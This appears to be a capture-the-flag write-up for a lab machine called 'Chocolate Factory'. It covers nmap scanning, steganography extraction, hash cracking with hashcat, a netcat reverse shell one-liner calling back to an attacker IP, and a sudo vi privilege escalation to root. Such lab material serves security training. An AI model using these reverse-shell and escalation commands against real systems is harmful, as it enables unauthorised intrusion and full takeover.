Chocolate Factory

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.46.164

Detailed Nmap Scan :

Command Breakdown:

• (-sV): Service version

• (-sC): Default nmap scripts

• (-p): Specifying ports 21,22,80

• (-oN nmap): Saving it into a file called nmap

nmap -sV -sC -p 21,22,80 -oN nmap 10.10.46.164

Enumeration

Port 21: FTP

Anonymous login is allowed so lets go check it out

ftp 10.10.46.164

Lets list the files.

Looks like there is one file and it is a image so lets transfer it to our machine

get gum_room.jpg

Lets look at the image

Lets see if there is information hidden in the file, so lets use steghide.

steghide info gum_room.jpg

I hit enter for the passphrase and it worked. We have one file called b64.txt, lets extract it.

steghide --extract -sf gum_room.jpg

Lets read the file

Lets decode it. After decoded this is the output.

We have the password hash for the user Charlie. Lets use hashcat to crack this hash to get the password for Charlie.

Copy the hash into a file called hash.txt.

And now lets use hashcat to crack it.

hashcat -a 0 -m 1800 hash.txt /usr/share/wordlists/rockyou.txt

We found the password: cn7824 , lets try to login through ssh.

ssh charlie@10.10.46.164

Looks like this is not the password for ssh, lets go explore port 80

Port 80: HTTP

Lets visit the website

Its a login page, remember the credentials we found, lets use them to login.

We logged in , looks like we can run commands, and normal commands work so lets run a reverse shell and get a reverse shell, lets first start a netcat listener

nc -lvnp 1234

Lets get a reverse shell from here.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

Lets execute this command, and we get a reverse shell on the machine

Lets stabilize this shell, using these commands

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
reset
Ctrl + C
export TERM=xterm-color

Lets list the files in the current directory

We have a validate.php file, lets read it

We see the credentials we just used to login in the web page. I tried to run the key file but it said permission denied

So I used a command that lets us look at some information which is called strings and it gave me important information

strings key_rev_key

We have a key. With this information we can answer two questions in the room

I was enumerating when I realized that we can change directories into Charlie, so I listed the files and found the user.txt and some other files.

Lets read the teleport file.

Its a rsa private key, we can use this to login as charlie through ssh, lets do that. First copy the contents of the file into a file on your machine called id_rsa.

Now we should change the permissions of the file

chmod 600 id_rsa

Now lets login

ssh -i id_rsa charlie@10.10.46.164

We are logged in.

Privilege Escalation

Lets run sudo -l to see what we can run as root

sudo -l

Looks like we can run /usr/bin/vi as root so lets go to GTFOBins to find the commands to escalate our privilege to root.

Lets run this command

sudo vi -c ':!/bin/sh' /dev/null

We are now root, lets cd into the root folder to find the root flag, it looks like we need to run a python script to get the flag, lets run it, oh its asking for a key, remember when we found the key during enumeration, type that in and you should get the flag